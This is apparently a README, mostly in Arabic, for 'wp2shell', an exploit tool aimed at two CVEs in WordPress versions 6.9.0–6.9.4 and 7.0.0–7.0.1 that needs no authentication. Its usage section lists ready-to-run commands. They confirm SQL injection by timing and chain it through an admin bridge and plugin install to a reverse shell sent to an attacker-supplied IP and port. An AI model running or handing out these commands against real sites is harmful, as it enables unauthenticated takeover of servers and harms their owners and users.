wp2shell (CVE-2026-63030 / CVE-2026-60137)
| |
|---|
| الاسم | wp2shell |
| CVEs | CVE-2026-63030 (عدم تزامن الدفعات), CVE-2026-60137 (حقن SQL عبر author__not_in) |
| المتأثر | WordPress 6.9.0 إلى 6.9.4, 7.0.0 إلى 7.0.1 |
| تم الإصلاح في | 6.9.5, 7.0.2 |
| المصادقة المطلوبة | لا شيء |
| اكتشفه | Adam Kues (Searchlight Cyber / Assetnote) |
الاستخدام
المضيف المجرد = كشف النطاق تلقائيًا (يحاول https:// ثم http://). أضف http:// أو https:// فقط عندما تريد فرض نطاق معين.
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080
# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/
# timing confirm
wp2shell target.example --confirm-sqli
# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443